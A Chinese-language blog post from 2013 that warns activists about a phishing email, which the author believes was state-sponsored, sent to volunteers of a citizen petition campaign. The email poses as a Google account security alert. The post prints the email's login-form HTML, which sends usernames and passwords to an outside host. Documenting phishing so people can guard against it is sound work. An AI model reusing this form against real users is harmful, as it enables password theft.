malware archive. state-sponsored attacks. 来自国家资助的针对社会活动者的木马邮件汇总, 高级持续性威胁(Advanced Persistent Threat,APT)
2013年9月16日星期一
公民联署志愿者收到来自政府资助的攻击邮件
收到针对此次签名联署活动的攻击,我们有理由相信这是政府资助的攻击,未必是政府的公务执行此攻击,攻击者会尝试得到密码后卖给政府。
邮件中冒充GOOGLE帐户安全提醒,要求输入密码。这是密码钓鱼,针对一般志愿者也许就造成密码泄露了,所以我觉得有必要公布, 让更多人有防范意识。
下面的源代码中显示,会把密码提交到
http://www.09dg123.com/ads/img.asp?a=s&b=c&id=af0e72578b20cb7f690d1141117aecec
这样密码就被别人存储了:
<form action="http://www.09dg123.com/ads/img.asp?a=s&b=c&id=af0e72578b20cb7f690d1141117aecec" method="post" target="_blank" onsubmit="return window.confirm("您确实要将信息提交到外部网页?");"><div name="gaia_loginbox"><table cellspacing="3" cellpadding="5" border="0" width="100%"><tbody><tr><td nowrap="" bgcolor="#e8eefa" valign="top" style="text-align:center"><div><table cellspacing="0" cellpadding="1" border="0" align="center"><tbody><tr><td align="center" colspan="2"><table><tbody><tr><td valign="top"><b></b></td><td valign="middle"><font size="-0"><b>帐户</b></font></td></tr></tbody></table><font size="-1">登录到</font></td></tr><tr><td align="center" colspan="2"></td></tr> <tr><td nowrap=""><div align="right"><span>用户名:</span></div></td><td> <input type="text" name="user" value="[email protected]"></td></tr><tr><td></td><td align="left"> </td></tr><tr><td align="right"><span>密码:</span></td><td> <input name="pass" type="password" value=""></td></tr><tr><td></td><td align="left"></td></tr><tr><td valign="top" align="right"> <input type="checkbox" value="yes" name="PersistentCookie"></td><td><span>在此计算机上保存我的信息。</span></td></tr><tr><td></td><td align="left"> <input type="submit" value="激活"></td></tr><tr><td height="33" valign="bottom" align="center" colspan="2"></td></tr></tbody></table></div></td></tr></tbody></table></div></form>
邮件源代码下载保存为:
http://file.zuo.la/virusmail/2013SEP/gongminglianshu.txt
供安全研究人员研究。
订阅:
博文评论 (Atom)
没有评论:
发表评论